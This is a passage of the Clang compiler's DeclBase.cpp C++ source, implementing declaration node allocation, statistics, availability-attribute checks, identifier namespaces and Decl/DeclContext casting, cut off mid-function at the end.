580 push @psql, '-qAtX';
581 push @psql, ( '-U', $self->{ 'username' } ) if $self->{ 'username' };
582 push @psql, ( '-d', $self->{ 'database' } ) if $self->{ 'database' };
583 push @psql, ( '-h', $self->{ 'host' } ) if $self->{ 'host' };
584 push @psql, ( '-p', $self->{ 'port' } ) if $self->{ 'port' };
585 push @psql, '-c';
586 $self->{ 'psql' } = \@psql;
587
588 return;
589 }
590
591 =head1 validate_args()
592
593 Does all necessary validation of given command line arguments.
594
595 One exception is for compression programs paths - technically, it could be validated in here, but benefit would be pretty limited, and code to do so relatively complex, as compression program path
596 might, but doesn't have to be actual file path - it might be just program name (without path), which is the default.
597
598 =cut
599
600 sub validate_args {
601 my $self = shift;
602
603 $self->log->fatal( 'Data-dir was not provided!' ) unless defined $self->{ 'data-dir' };
604 $self->log->fatal( 'Provided data-dir (%s) does not exist!', $self->{ 'data-dir' } ) unless -e $self->{ 'data-dir' };
605 $self->log->fatal( 'Provided data-dir (%s) is not directory!', $self->{ 'data-dir' } ) unless -d $self->{ 'data-dir' };
606 $self->log->fatal( 'Provided data-dir (%s) is not readable!', $self->{ 'data-dir' } ) unless -r $self->{ 'data-dir' };
607
608 my $dst_count = scalar( @{ $self->{ 'destination' }->{ 'local' } } ) + scalar( @{ $self->{ 'destination' }->{ 'remote' } } );
609 $self->log->fatal( "No --dst-* has been provided!" ) if 0 == $dst_count;
610
611 $self->log->fatal( "Filename template does not contain __FILETYPE__ placeholder!" ) unless $self->{ 'filename-template' } =~ /__FILETYPE__/;
612 $self->log->fatal( "Filename template cannot contain / or \\ characters!" ) if $self->{ 'filename-template' } =~ m{[/\\]};
613
614 $self->log->fatal( "Xlogs dir (--xlogs) was not given! Cannot work without it" ) unless defined $self->{ 'xlogs' };
615 $self->{ 'xlogs' } =~ s{/+$}{};
616 $self->log->fatal( "Xlogs dir (%s) already exists! It shouldn't.", $self->{ 'xlogs' } ) if -e $self->{ 'xlogs' };
617 $self->log->fatal( "Xlogs side dir (%s.real) already exists! It shouldn't.", $self->{ 'xlogs' } ) if -e $self->{ 'xlogs' } . '.real';
618
619 my $xlog_parent = dirname( $self->{ 'xlogs' } );
620 $self->log->fatal( 'Xlogs dir (%s) parent (%s) does not exist. Cannot continue.', $self->{ 'xlogs' }, $xlog_parent ) unless -e $xlog_parent;
621 $self->log->fatal( 'Xlogs dir (%s) parent (%s) is not directory. Cannot continue.', $self->{ 'xlogs' }, $xlog_parent ) unless -d $xlog_parent;
622 $self->log->fatal( 'Xlogs dir (%s) parent (%s) is not writable. Cannot continue.', $self->{ 'xlogs' }, $xlog_parent ) unless -w $xlog_parent;
623
624 return;
625 }
626
627 1;
Note: See TracBrowser for help on using the browser.
|
__label__pos
| 0.982929 |
Basic HBase Java Classes and Methods – Part 4: Putting Data into a Table
To put data into a table in HBase, we will create a Class very similar in structure to our last Class in Part 3. Instead of using an Admin object, which is used to create a table or delete it, we will just work with a regular table object. All data in HBase is stored as byte arrays. Lets create our imports and basic variables to store our column family names and columns.
Now we create our main method, create a connection to our Table, instantiate a Put object and add columns to it using our addColumn method. Finally we use the put method on the Table object to put the data into the table. We have the table defined outside of the try block because we need to check for it in the finally block later on, and we can’t do that if its defined in the try block itself, as then it would be out of scope.
This is a very simple case. We did not have to insert all of the columns, we could have left many blank just as we did before when using the HBase shell. The HBase table put method is overloaded and supports either passing in a Put object or a list of Put objects. We will now put more data in using a list of Put objects.
Last we will use our finally block to close our connection to HBase and check if we have an open table and if so close it.
So the completed program looks like so:
We can see that our data was added properly by checking with scan from the HBase shell.
Next we will explore how we can retrieve column data from the HBase table in Basic HBase Java Classes and Methods – Part 5: Getting Data from a Table.
This entry was posted in Data Analytics and tagged , . Bookmark the permalink.
Leave a Reply
|
__label__pos
| 0.829315 |
Sign up ×
Stack Overflow is a community of 4.7 million programmers, just like you, helping each other. Join them; it only takes a minute:
I draw a line using "graphics.lineTo" into a movieclip and i need to change my linestyle if the user ask for that throw a button in runtime. I can change the color, but i can't change the linestyle...
Is there someway to change it?
share|improve this question
1 Answer 1
You cannot change the line style once the line has been drawn. You need to record yourself the steps that produce the graphics (moveTo, lineTo, lineStyle, beginFill, etc.) and recreate it when the user changes the line style.
share|improve this answer
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.725026 |
Commit 971f359d authored by YOSHIFUJI Hideaki's avatar YOSHIFUJI Hideaki Committed by David S. Miller
Browse files
[IPV6]: Put addr_diff() into common header for future use.
Signed-off-by: default avatarYOSHIFUJI Hideaki <[email protected]>
Signed-off-by: default avatarDavid S. Miller <[email protected]>
parent f093182d
......@@ -340,6 +340,54 @@ static inline int ipv6_addr_any(const struct in6_addr *a)
a->s6_addr32[2] | a->s6_addr32[3] ) == 0);
}
/*
* find the first different bit between two addresses
* length of address must be a multiple of 32bits
*/
static inline int __ipv6_addr_diff(const void *token1, const void *token2, int addrlen)
{
const __u32 *a1 = token1, *a2 = token2;
int i;
addrlen >>= 2;
for (i = 0; i < addrlen; i++) {
__u32 xb = a1[i] ^ a2[i];
if (xb) {
int j = 31;
xb = ntohl(xb);
while ((xb & (1 << j)) == 0)
j--;
return (i * 32 + 31 - j);
}
}
/*
* we should *never* get to this point since that
* would mean the addrs are equal
*
* However, we do get to it 8) And exacly, when
* addresses are equal 8)
*
* ip route add 1111::/128 via ...
* ip route add 1111::/64 via ...
* and we are here.
*
* Ideally, this function should stop comparison
* at prefix length. It does not, but it is still OK,
* if returned value is greater than prefix length.
* --ANK (980803)
*/
return (addrlen << 5);
}
static inline int ipv6_addr_diff(const struct in6_addr *a1, const struct in6_addr *a2)
{
return __ipv6_addr_diff(a1, a2, sizeof(struct in6_addr));
}
/*
* Prototypes exported by ipv6
*/
......
......@@ -127,56 +127,6 @@ static __inline__ int addr_bit_set(void *token, int fn_bit)
return htonl(1 << ((~fn_bit)&0x1F)) & addr[fn_bit>>5];
}
/*
* find the first different bit between two addresses
* length of address must be a multiple of 32bits
*/
static __inline__ int addr_diff(void *token1, void *token2, int addrlen)
{
__u32 *a1 = token1;
__u32 *a2 = token2;
int i;
addrlen >>= 2;
for (i = 0; i < addrlen; i++) {
__u32 xb;
xb = a1[i] ^ a2[i];
if (xb) {
int j = 31;
xb = ntohl(xb);
while ((xb & (1 << j)) == 0)
j--;
return (i * 32 + 31 - j);
}
}
/*
* we should *never* get to this point since that
* would mean the addrs are equal
*
* However, we do get to it 8) And exacly, when
* addresses are equal 8)
*
* ip route add 1111::/128 via ...
* ip route add 1111::/64 via ...
* and we are here.
*
* Ideally, this function should stop comparison
* at prefix length. It does not, but it is still OK,
* if returned value is greater than prefix length.
* --ANK (980803)
*/
return addrlen<<5;
}
static __inline__ struct fib6_node * node_alloc(void)
{
struct fib6_node *fn;
......@@ -296,11 +246,11 @@ insert_above:
/* find 1st bit in difference between the 2 addrs.
See comment in addr_diff: bit may be an invalid value,
See comment in __ipv6_addr_diff: bit may be an invalid value,
but if it is >= plen, the value is ignored in any case.
*/
bit = addr_diff(addr, &key->addr, addrlen);
bit = __ipv6_addr_diff(addr, &key->addr, addrlen);
/*
* (intermediate)[in]
......
Markdown is supported
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment
|
__label__pos
| 0.893266 |
$.each( model.getRows() TypeError: Cannot read property 'each' of undefined
What am I doing wrong?
I have a table full of Proposal records. Each Proposal has a child record that we call a Commit. I want to let a user select some or all Proposals, enter a couple dates in a popup, and update those dates on the child Commit record of each selected Proposal.
The popup has a field editor with two date fields from a Ui-only model, and a title component with a button that runs the following snippet.
var table = skuid.$('#vwProposalTableFull'),
list,
datesModel = skuid.$M('vwCommitUpdates_UiOnly'); // the ui-only model that accepts new dates from the user
datesModel.save();
var datesRow = datesModel.getFirstRow(),
sentDate = datesModel.getFieldValue(datesRow,'Award_Letter_Sent_Ui'),
signedDate = datesModel.getFieldValue(datesRow,'Award_Letter_Signed_Ui');
// STEP 1: Load array with IDs of selected Proposals from the table. Funded only.
// This step works correctly.
if (table.length) {
list = table.data('object').list;
}
var idsArray = skuid.$.map(list.getSelectedItems(), function(item) {
if (item.row.Status__c == "Funded") {
return item.row.Id;
}
});
// STEP 2: Set condition to get only the Commits that belong to selected Proposals
// This step works correctly
var model = skuid.$M('vwCommitUpdates'),
condition = model.getConditionByName('Proposal_Details__c');
model.setCondition(condition, idsArray, false);
// STEP 3: Query model. When query completes, callback loops through each row to update date fields.
// This step is not working correctly.
model.updateData( function() {
try {
$.each(model.data, function(i, row) {
//if(row.Award_letter_sent__c ... I will set conditions here, when I get it working ) {
model.updateRow(row, 'Award_letter_sent__c', sentDate);
model.updateRow(row, 'Award_Letter_Signed__c', signedDate);
//}
});
} catch(err) {
console.log('error! ... ' + err); // Result is always: "TypeError: Cannot read property 'each' of undefined"
} finally {
console.log('code in finally');
}
model.save();
});
// STEP 4: housekeeping (close popup etc)
skuid.$('.ui-dialog-content').dialog('close');```
Steps 1, 2, and 4 work correctly. I cannot get Step 3 to work. The result of my try/catch is always err: "TypeError: Cannot read property 'each' of undefined".
When I step through this code in the console, or use console.log to show the state of vars in each block, I see rows in model.
This syntax seems to obey the documentation here, https://docs.skuid.com/latest/en/skuid/api/skuid_model_model.html#skuid.model.Model.updateRows
I've tried the following variants in my try{} block, the result is the same TypeError: Cannot read property 'each' of undefined.
Variant 1:
var rowsToUpdate = {}; $.each( model.getRows(), function() { rowsToUpdate[this.Id] = { Award_letter_sent__c: sentDate,
Award_Letter_Signed__c: signedDate }; }); ```
model.updateRows( rowsToUpdate );```
Variant 2:
```
var rows [];
```
```
rows = model.getRows();
```
$.each(rows, function(row) {
model.updateRow(row, {
Award_letter_sent__c: sentDate,
Award_Letter_Signed__c: signedDate
}); });```
Do you just need to use skuid.$.each?
Wow! Look at that. I must have deleted my var assignment of $ = skuid.$. Thank you for rescuing me from my deep well of over-thinking.
Yep. I noticed the skuid.$ elsewhere in the code. But I had to actually look up the reason for assigning the dollarSign to skuid.$.
|
__label__pos
| 0.996463 |
blob: 4d3adc80e08f1aea23b3d2c078df251d3e9cbbb0 [file] [log] [blame]
//===--- DeclBase.cpp - Declaration AST Node Implementation ---------------===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This file implements the Decl and DeclContext classes.
//
//===----------------------------------------------------------------------===//
#include "clang/AST/DeclBase.h"
#include "clang/AST/ASTContext.h"
#include "clang/AST/ASTMutationListener.h"
#include "clang/AST/Attr.h"
#include "clang/AST/Decl.h"
#include "clang/AST/DeclCXX.h"
#include "clang/AST/DeclContextInternals.h"
#include "clang/AST/DeclFriend.h"
#include "clang/AST/DeclObjC.h"
#include "clang/AST/DeclOpenMP.h"
#include "clang/AST/DeclTemplate.h"
#include "clang/AST/DependentDiagnostic.h"
#include "clang/AST/ExternalASTSource.h"
#include "clang/AST/Stmt.h"
#include "clang/AST/StmtCXX.h"
#include "clang/AST/Type.h"
#include "clang/Basic/TargetInfo.h"
#include "llvm/Support/raw_ostream.h"
#include <algorithm>
using namespace clang;
//===----------------------------------------------------------------------===//
// Statistics
//===----------------------------------------------------------------------===//
#define DECL(DERIVED, BASE) static int n##DERIVED##s = 0;
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
void Decl::updateOutOfDate(IdentifierInfo &II) const {
getASTContext().getExternalSource()->updateOutOfDateIdentifier(II);
}
#define DECL(DERIVED, BASE) \
static_assert(llvm::AlignOf<Decl>::Alignment >= \
llvm::AlignOf<DERIVED##Decl>::Alignment, \
"Alignment sufficient after objects prepended to " #DERIVED);
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
void *Decl::operator new(std::size_t Size, const ASTContext &Context,
unsigned ID, std::size_t Extra) {
// Allocate an extra 8 bytes worth of storage, which ensures that the
// resulting pointer will still be 8-byte aligned.
static_assert(sizeof(unsigned) * 2 >= llvm::AlignOf<Decl>::Alignment,
"Decl won't be misaligned");
void *Start = Context.Allocate(Size + Extra + 8);
void *Result = (char*)Start + 8;
unsigned *PrefixPtr = (unsigned *)Result - 2;
// Zero out the first 4 bytes; this is used to store the owning module ID.
PrefixPtr[0] = 0;
// Store the global declaration ID in the second 4 bytes.
PrefixPtr[1] = ID;
return Result;
}
void *Decl::operator new(std::size_t Size, const ASTContext &Ctx,
DeclContext *Parent, std::size_t Extra) {
assert(!Parent || &Parent->getParentASTContext() == &Ctx);
// With local visibility enabled, we track the owning module even for local
// declarations.
if (Ctx.getLangOpts().ModulesLocalVisibility) {
// Ensure required alignment of the resulting object by adding extra
// padding at the start if required.
size_t ExtraAlign =
llvm::OffsetToAlignment(sizeof(Module *),
llvm::AlignOf<Decl>::Alignment);
char *Buffer = reinterpret_cast<char *>(
::operator new(ExtraAlign + sizeof(Module *) + Size + Extra, Ctx));
Buffer += ExtraAlign;
return new (Buffer) Module*(nullptr) + 1;
}
return ::operator new(Size + Extra, Ctx);
}
Module *Decl::getOwningModuleSlow() const {
assert(isFromASTFile() && "Not from AST file?");
return getASTContext().getExternalSource()->getModule(getOwningModuleID());
}
bool Decl::hasLocalOwningModuleStorage() const {
return getASTContext().getLangOpts().ModulesLocalVisibility;
}
const char *Decl::getDeclKindName() const {
switch (DeclKind) {
default: llvm_unreachable("Declaration not in DeclNodes.inc!");
#define DECL(DERIVED, BASE) case DERIVED: return #DERIVED;
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
}
}
void Decl::setInvalidDecl(bool Invalid) {
InvalidDecl = Invalid;
assert(!isa<TagDecl>(this) || !cast<TagDecl>(this)->isCompleteDefinition());
if (Invalid && !isa<ParmVarDecl>(this)) {
// Defensive maneuver for ill-formed code: we're likely not to make it to
// a point where we set the access specifier, so default it to "public"
// to avoid triggering asserts elsewhere in the front end.
setAccess(AS_public);
}
}
const char *DeclContext::getDeclKindName() const {
switch (DeclKind) {
default: llvm_unreachable("Declaration context not in DeclNodes.inc!");
#define DECL(DERIVED, BASE) case Decl::DERIVED: return #DERIVED;
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
}
}
bool Decl::StatisticsEnabled = false;
void Decl::EnableStatistics() {
StatisticsEnabled = true;
}
void Decl::PrintStats() {
llvm::errs() << "\n*** Decl Stats:\n";
int totalDecls = 0;
#define DECL(DERIVED, BASE) totalDecls += n##DERIVED##s;
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
llvm::errs() << " " << totalDecls << " decls total.\n";
int totalBytes = 0;
#define DECL(DERIVED, BASE) \
if (n##DERIVED##s > 0) { \
totalBytes += (int)(n##DERIVED##s * sizeof(DERIVED##Decl)); \
llvm::errs() << " " << n##DERIVED##s << " " #DERIVED " decls, " \
<< sizeof(DERIVED##Decl) << " each (" \
<< n##DERIVED##s * sizeof(DERIVED##Decl) \
<< " bytes)\n"; \
}
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
llvm::errs() << "Total bytes = " << totalBytes << "\n";
}
void Decl::add(Kind k) {
switch (k) {
#define DECL(DERIVED, BASE) case DERIVED: ++n##DERIVED##s; break;
#define ABSTRACT_DECL(DECL)
#include "clang/AST/DeclNodes.inc"
}
}
bool Decl::isTemplateParameterPack() const {
if (const TemplateTypeParmDecl *TTP = dyn_cast<TemplateTypeParmDecl>(this))
return TTP->isParameterPack();
if (const NonTypeTemplateParmDecl *NTTP
= dyn_cast<NonTypeTemplateParmDecl>(this))
return NTTP->isParameterPack();
if (const TemplateTemplateParmDecl *TTP
= dyn_cast<TemplateTemplateParmDecl>(this))
return TTP->isParameterPack();
return false;
}
bool Decl::isParameterPack() const {
if (const ParmVarDecl *Parm = dyn_cast<ParmVarDecl>(this))
return Parm->isParameterPack();
return isTemplateParameterPack();
}
FunctionDecl *Decl::getAsFunction() {
if (FunctionDecl *FD = dyn_cast<FunctionDecl>(this))
return FD;
if (const FunctionTemplateDecl *FTD = dyn_cast<FunctionTemplateDecl>(this))
return FTD->getTemplatedDecl();
return nullptr;
}
bool Decl::isTemplateDecl() const {
return isa<TemplateDecl>(this);
}
TemplateDecl *Decl::getDescribedTemplate() const {
if (auto *FD = dyn_cast<FunctionDecl>(this))
return FD->getDescribedFunctionTemplate();
else if (auto *RD = dyn_cast<CXXRecordDecl>(this))
return RD->getDescribedClassTemplate();
else if (auto *VD = dyn_cast<VarDecl>(this))
return VD->getDescribedVarTemplate();
return nullptr;
}
const DeclContext *Decl::getParentFunctionOrMethod() const {
for (const DeclContext *DC = getDeclContext();
DC && !DC->isTranslationUnit() && !DC->isNamespace();
DC = DC->getParent())
if (DC->isFunctionOrMethod())
return DC;
return nullptr;
}
//===----------------------------------------------------------------------===//
// PrettyStackTraceDecl Implementation
//===----------------------------------------------------------------------===//
void PrettyStackTraceDecl::print(raw_ostream &OS) const {
SourceLocation TheLoc = Loc;
if (TheLoc.isInvalid() && TheDecl)
TheLoc = TheDecl->getLocation();
if (TheLoc.isValid()) {
TheLoc.print(OS, SM);
OS << ": ";
}
OS << Message;
if (const NamedDecl *DN = dyn_cast_or_null<NamedDecl>(TheDecl)) {
OS << " '";
DN->printQualifiedName(OS);
OS << '\'';
}
OS << '\n';
}
//===----------------------------------------------------------------------===//
// Decl Implementation
//===----------------------------------------------------------------------===//
// Out-of-line virtual method providing a home for Decl.
Decl::~Decl() { }
void Decl::setDeclContext(DeclContext *DC) {
DeclCtx = DC;
}
void Decl::setLexicalDeclContext(DeclContext *DC) {
if (DC == getLexicalDeclContext())
return;
if (isInSemaDC()) {
setDeclContextsImpl(getDeclContext(), DC, getASTContext());
} else {
getMultipleDC()->LexicalDC = DC;
}
Hidden = cast<Decl>(DC)->Hidden;
}
void Decl::setDeclContextsImpl(DeclContext *SemaDC, DeclContext *LexicalDC,
ASTContext &Ctx) {
if (SemaDC == LexicalDC) {
DeclCtx = SemaDC;
} else {
Decl::MultipleDC *MDC = new (Ctx) Decl::MultipleDC();
MDC->SemanticDC = SemaDC;
MDC->LexicalDC = LexicalDC;
DeclCtx = MDC;
}
}
bool Decl::isLexicallyWithinFunctionOrMethod() const {
const DeclContext *LDC = getLexicalDeclContext();
while (true) {
if (LDC->isFunctionOrMethod())
return true;
if (!isa<TagDecl>(LDC))
return false;
LDC = LDC->getLexicalParent();
}
return false;
}
bool Decl::isInAnonymousNamespace() const {
const DeclContext *DC = getDeclContext();
do {
if (const NamespaceDecl *ND = dyn_cast<NamespaceDecl>(DC))
if (ND->isAnonymousNamespace())
return true;
} while ((DC = DC->getParent()));
return false;
}
bool Decl::isInStdNamespace() const {
return getDeclContext()->isStdNamespace();
}
TranslationUnitDecl *Decl::getTranslationUnitDecl() {
if (TranslationUnitDecl *TUD = dyn_cast<TranslationUnitDecl>(this))
return TUD;
DeclContext *DC = getDeclContext();
assert(DC && "This decl is not contained in a translation unit!");
while (!DC->isTranslationUnit()) {
DC = DC->getParent();
assert(DC && "This decl is not contained in a translation unit!");
}
return cast<TranslationUnitDecl>(DC);
}
ASTContext &Decl::getASTContext() const {
return getTranslationUnitDecl()->getASTContext();
}
ASTMutationListener *Decl::getASTMutationListener() const {
return getASTContext().getASTMutationListener();
}
unsigned Decl::getMaxAlignment() const {
if (!hasAttrs())
return 0;
unsigned Align = 0;
const AttrVec &V = getAttrs();
ASTContext &Ctx = getASTContext();
specific_attr_iterator<AlignedAttr> I(V.begin()), E(V.end());
for (; I != E; ++I)
Align = std::max(Align, I->getAlignment(Ctx));
return Align;
}
bool Decl::isUsed(bool CheckUsedAttr) const {
const Decl *CanonD = getCanonicalDecl();
if (CanonD->Used)
return true;
// Check for used attribute.
// Ask the most recent decl, since attributes accumulate in the redecl chain.
if (CheckUsedAttr && getMostRecentDecl()->hasAttr<UsedAttr>())
return true;
// The information may have not been deserialized yet. Force deserialization
// to complete the needed information.
return getMostRecentDecl()->getCanonicalDecl()->Used;
}
void Decl::markUsed(ASTContext &C) {
if (isUsed(false))
return;
if (C.getASTMutationListener())
C.getASTMutationListener()->DeclarationMarkedUsed(this);
setIsUsed();
}
bool Decl::isReferenced() const {
if (Referenced)
return true;
// Check redeclarations.
for (auto I : redecls())
if (I->Referenced)
return true;
return false;
}
bool Decl::hasDefiningAttr() const {
return hasAttr<AliasAttr>() || hasAttr<IFuncAttr>();
}
const Attr *Decl::getDefiningAttr() const {
if (AliasAttr *AA = getAttr<AliasAttr>())
return AA;
if (IFuncAttr *IFA = getAttr<IFuncAttr>())
return IFA;
return nullptr;
}
/// \brief Determine the availability of the given declaration based on
/// the target platform.
///
/// When it returns an availability result other than \c AR_Available,
/// if the \p Message parameter is non-NULL, it will be set to a
/// string describing why the entity is unavailable.
///
/// FIXME: Make these strings localizable, since they end up in
/// diagnostics.
static AvailabilityResult CheckAvailability(ASTContext &Context,
const AvailabilityAttr *A,
std::string *Message,
VersionTuple EnclosingVersion) {
if (EnclosingVersion.empty())
EnclosingVersion = Context.getTargetInfo().getPlatformMinVersion();
if (EnclosingVersion.empty())
return AR_Available;
// Check if this is an App Extension "platform", and if so chop off
// the suffix for matching with the actual platform.
StringRef ActualPlatform = A->getPlatform()->getName();
StringRef RealizedPlatform = ActualPlatform;
if (Context.getLangOpts().AppExt) {
size_t suffix = RealizedPlatform.rfind("_app_extension");
if (suffix != StringRef::npos)
RealizedPlatform = RealizedPlatform.slice(0, suffix);
}
StringRef TargetPlatform = Context.getTargetInfo().getPlatformName();
// Match the platform name.
if (RealizedPlatform != TargetPlatform)
return AR_Available;
StringRef PrettyPlatformName
= AvailabilityAttr::getPrettyPlatformName(ActualPlatform);
if (PrettyPlatformName.empty())
PrettyPlatformName = ActualPlatform;
std::string HintMessage;
if (!A->getMessage().empty()) {
HintMessage = " - ";
HintMessage += A->getMessage();
}
// Make sure that this declaration has not been marked 'unavailable'.
if (A->getUnavailable()) {
if (Message) {
Message->clear();
llvm::raw_string_ostream Out(*Message);
Out << "not available on " << PrettyPlatformName
<< HintMessage;
}
return AR_Unavailable;
}
// Make sure that this declaration has already been introduced.
if (!A->getIntroduced().empty() &&
EnclosingVersion < A->getIntroduced()) {
if (Message) {
Message->clear();
llvm::raw_string_ostream Out(*Message);
VersionTuple VTI(A->getIntroduced());
VTI.UseDotAsSeparator();
Out << "introduced in " << PrettyPlatformName << ' '
<< VTI << HintMessage;
}
return A->getStrict() ? AR_Unavailable : AR_NotYetIntroduced;
}
// Make sure that this declaration hasn't been obsoleted.
if (!A->getObsoleted().empty() && EnclosingVersion >= A->getObsoleted()) {
if (Message) {
Message->clear();
llvm::raw_string_ostream Out(*Message);
VersionTuple VTO(A->getObsoleted());
VTO.UseDotAsSeparator();
Out << "obsoleted in " << PrettyPlatformName << ' '
<< VTO << HintMessage;
}
return AR_Unavailable;
}
// Make sure that this declaration hasn't been deprecated.
if (!A->getDeprecated().empty() && EnclosingVersion >= A->getDeprecated()) {
if (Message) {
Message->clear();
llvm::raw_string_ostream Out(*Message);
VersionTuple VTD(A->getDeprecated());
VTD.UseDotAsSeparator();
Out << "first deprecated in " << PrettyPlatformName << ' '
<< VTD << HintMessage;
}
return AR_Deprecated;
}
return AR_Available;
}
AvailabilityResult Decl::getAvailability(std::string *Message,
VersionTuple EnclosingVersion) const {
if (auto *FTD = dyn_cast<FunctionTemplateDecl>(this))
return FTD->getTemplatedDecl()->getAvailability(Message, EnclosingVersion);
AvailabilityResult Result = AR_Available;
std::string ResultMessage;
for (const auto *A : attrs()) {
if (const auto *Deprecated = dyn_cast<DeprecatedAttr>(A)) {
if (Result >= AR_Deprecated)
continue;
if (Message)
ResultMessage = Deprecated->getMessage();
Result = AR_Deprecated;
continue;
}
if (const auto *Unavailable = dyn_cast<UnavailableAttr>(A)) {
if (Message)
*Message = Unavailable->getMessage();
return AR_Unavailable;
}
if (const auto *Availability = dyn_cast<AvailabilityAttr>(A)) {
AvailabilityResult AR = CheckAvailability(getASTContext(), Availability,
Message, EnclosingVersion);
if (AR == AR_Unavailable)
return AR_Unavailable;
if (AR > Result) {
Result = AR;
if (Message)
ResultMessage.swap(*Message);
}
continue;
}
}
if (Message)
Message->swap(ResultMessage);
return Result;
}
bool Decl::canBeWeakImported(bool &IsDefinition) const {
IsDefinition = false;
// Variables, if they aren't definitions.
if (const VarDecl *Var = dyn_cast<VarDecl>(this)) {
if (Var->isThisDeclarationADefinition()) {
IsDefinition = true;
return false;
}
return true;
// Functions, if they aren't definitions.
} else if (const FunctionDecl *FD = dyn_cast<FunctionDecl>(this)) {
if (FD->hasBody()) {
IsDefinition = true;
return false;
}
return true;
// Objective-C classes, if this is the non-fragile runtime.
} else if (isa<ObjCInterfaceDecl>(this) &&
getASTContext().getLangOpts().ObjCRuntime.hasWeakClassImport()) {
return true;
// Nothing else.
} else {
return false;
}
}
bool Decl::isWeakImported() const {
bool IsDefinition;
if (!canBeWeakImported(IsDefinition))
return false;
for (const auto *A : attrs()) {
if (isa<WeakImportAttr>(A))
return true;
if (const auto *Availability = dyn_cast<AvailabilityAttr>(A)) {
if (CheckAvailability(getASTContext(), Availability, nullptr,
VersionTuple()) == AR_NotYetIntroduced)
return true;
}
}
return false;
}
unsigned Decl::getIdentifierNamespaceForKind(Kind DeclKind) {
switch (DeclKind) {
case Function:
case CXXMethod:
case CXXConstructor:
case ConstructorUsingShadow:
case CXXDestructor:
case CXXConversion:
case EnumConstant:
case Var:
case Binding:
case ImplicitParam:
case ParmVar:
case ObjCMethod:
case ObjCProperty:
case MSProperty:
return IDNS_Ordinary;
case Label:
return IDNS_Label;
case IndirectField:
return IDNS_Ordinary | IDNS_Member;
case NonTypeTemplateParm:
// Non-type template parameters are not found by lookups that ignore
// non-types, but they are found by redeclaration lookups for tag types,
// so we include them in the tag namespace.
return IDNS_Ordinary | IDNS_Tag;
case ObjCCompatibleAlias:
case ObjCInterface:
return IDNS_Ordinary | IDNS_Type;
case Typedef:
case TypeAlias:
case TypeAliasTemplate:
case UnresolvedUsingTypename:
case TemplateTypeParm:
case ObjCTypeParam:
return IDNS_Ordinary | IDNS_Type;
case UsingShadow:
return 0; // we'll actually overwrite this later
case UnresolvedUsingValue:
return IDNS_Ordinary | IDNS_Using;
case Using:
return IDNS_Using;
case ObjCProtocol:
return IDNS_ObjCProtocol;
case Field:
case ObjCAtDefsField:
case ObjCIvar:
return IDNS_Member;
case Record:
case CXXRecord:
case Enum:
return IDNS_Tag | IDNS_Type;
case Namespace:
case NamespaceAlias:
return IDNS_Namespace;
case FunctionTemplate:
case VarTemplate:
return IDNS_Ordinary;
case ClassTemplate:
case TemplateTemplateParm:
return IDNS_Ordinary | IDNS_Tag | IDNS_Type;
case OMPDeclareReduction:
return IDNS_OMPReduction;
// Never have names.
case Friend:
case FriendTemplate:
case AccessSpec:
case LinkageSpec:
case FileScopeAsm:
case StaticAssert:
case ObjCPropertyImpl:
case PragmaComment:
case PragmaDetectMismatch:
case Block:
case Captured:
case TranslationUnit:
case ExternCContext:
case Decomposition:
case UsingDirective:
case BuiltinTemplate:
case ClassTemplateSpecialization:
case ClassTemplatePartialSpecialization:
case ClassScopeFunctionSpecialization:
case VarTemplateSpecialization:
case VarTemplatePartialSpecialization:
case ObjCImplementation:
case ObjCCategory:
case ObjCCategoryImpl:
case Import:
case OMPThreadPrivate:
case OMPCapturedExpr:
case Empty:
// Never looked up by name.
return 0;
}
llvm_unreachable("Invalid DeclKind!");
}
void Decl::setAttrsImpl(const AttrVec &attrs, ASTContext &Ctx) {
assert(!HasAttrs && "Decl already contains attrs.");
AttrVec &AttrBlank = Ctx.getDeclAttrs(this);
assert(AttrBlank.empty() && "HasAttrs was wrong?");
AttrBlank = attrs;
HasAttrs = true;
}
void Decl::dropAttrs() {
if (!HasAttrs) return;
HasAttrs = false;
getASTContext().eraseDeclAttrs(this);
}
const AttrVec &Decl::getAttrs() const {
assert(HasAttrs && "No attrs to get!");
return getASTContext().getDeclAttrs(this);
}
Decl *Decl::castFromDeclContext (const DeclContext *D) {
Decl::Kind DK = D->getDeclKind();
switch(DK) {
#define DECL(NAME, BASE)
#define DECL_CONTEXT(NAME) \
case Decl::NAME: \
return static_cast<NAME##Decl*>(const_cast<DeclContext*>(D));
#define DECL_CONTEXT_BASE(NAME)
#include "clang/AST/DeclNodes.inc"
default:
#define DECL(NAME, BASE)
#define DECL_CONTEXT_BASE(NAME) \
if (DK >= first##NAME && DK <= last##NAME) \
return static_cast<NAME##Decl*>(const_cast<DeclContext*>(D));
#include "clang/AST/DeclNodes.inc"
llvm_unreachable("a decl that inherits DeclContext isn't handled");
}
}
DeclContext *Decl::castToDeclContext(const Decl *D) {
Decl::Kind DK = D->getKind();
switch(DK) {
#define DECL(NAME, BASE)
#define DECL_CONTEXT(NAME) \
case Decl::NAME: \
return static_cast<NAME##Decl*>(const_cast<Decl*>(D));
#define DECL_CONTEXT_BASE(NAME)
#include "clang/AST/DeclNodes.inc"
default:
#define DECL(NAME, BASE)
#define DECL_CONTEXT_BASE(NAME) \
if (DK >= first##NAME && DK <= last##NAME) \
return static_cast<NAME##Decl*>(const_cast<Decl*>(D));
#include "clang/AST/DeclNodes.inc"
llvm_unreachable("a decl that inherits DeclContext isn't handled");
}
}
SourceLocation Decl::getBodyRBrace() const {
// Special handling of FunctionDecl to avoid de-serializing the body from PCH.
// FunctionDecl stores EndRangeLoc for this purpose.
if (const FunctionDecl *FD = dyn_cast<FunctionDecl>(this)) {
const FunctionDecl *Definition;
if (FD->hasBody(Definition))
return Definition->getSourceRange().getEnd();
return SourceLocation();
}
if (Stmt *Body = getBody())
return Body->getSourceRange().getEnd();
return SourceLocation();
}
bool Decl::AccessDeclContextSanity() const {
